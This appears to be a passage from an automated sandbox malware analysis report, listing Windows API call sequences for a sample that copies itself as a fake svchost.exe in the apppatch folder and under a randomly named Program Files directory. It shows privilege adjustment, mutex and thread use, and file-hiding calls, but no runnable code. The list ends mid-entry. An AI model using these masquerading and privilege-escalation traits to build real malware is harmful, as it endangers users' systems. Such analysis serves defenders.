Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,0_2_00402C10
Source: C:\Windows\apppatch\svchost.exeCode function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,2_2_00403900
Source: C:\Windows\apppatch\svchost.exeCode function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,2_2_00402C10
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,2_2_02C85890
Source: C:\Windows\apppatch\svchost.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,2_2_02C77020
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,2_2_02C844F0
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,2_2_02C90BE0
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,2_2_02C92320
Source: C:\Windows\apppatch\svchost.exeCode function: GetUserNameA,memset,InitializeCriticalSection,StrStrIA,2_2_02C89860
Source: C:\Windows\apppatch\svchost.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,2_2_02C8B810
Source: C:\Windows\apppatch\svchost.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,2_2_02C911C0
Source: C:\Windows\apppatch\svchost.exeCode function: CreateThread,StrStrIA,GetHandleInformation,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,CreateThread,wsprintfA,wsprintfA,wsprintfA,CreateThread,wsprintfA,2_2_02C7C9F0
Source: C:\Windows\apppatch\svchost.exeCode function: memset,VirtualQuery,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,2_2_02C71180
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,StrStrIA,2_2_02C91150
Source: C:\Windows\apppatch\svchost.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,2_2_02C71670
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,2_2_02C8FFE0
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,2_2_02C8FDC0
Source: C:\Windows\apppatch\svchost.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,2_2_02C92590
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA,CreateMutexA,GetLastError,2_2_02C73510
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,6_2_01255890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,StrStrIA,6_2_01261150
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,6_2_01241180
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: CreateThread,StrStrIA,GetHandleInformation,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,CreateThread,wsprintfA,wsprintfA,wsprintfA,CreateThread,wsprintfA,6_2_0124C9F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,6_2_012611C0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,6_2_01247020
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,6_2_0125B810
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetUserNameA,memset,InitializeCriticalSection,StrStrIA,6_2_01259860
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,6_2_01262320
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,6_2_01260BE0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError,6_2_01243510
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,6_2_01262590
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,6_2_0125FDC0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,6_2_012544F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,6_2_0125FFE0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,6_2_01241670
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,7_2_01055890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,StrStrIA,7_2_01061150
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,7_2_01041180
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,7_2_010611C0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: CreateThread,StrStrIA,GetHandleInformation,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,CreateThread,wsprintfA,wsprintfA,wsprintfA,CreateThread,wsprintfA,7_2_0104C9F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,7_2_0105B810
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,7_2_01047020
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetUserNameA,memset,InitializeCriticalSection,StrStrIA,7_2_01059860
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,7_2_01062320
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,7_2_01060BE0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError,7_2_01043510
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,7_2_01062590
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,7_2_0105FDC0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,7_2_010544F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,7_2_0105FFE0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,7_2_01041670
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 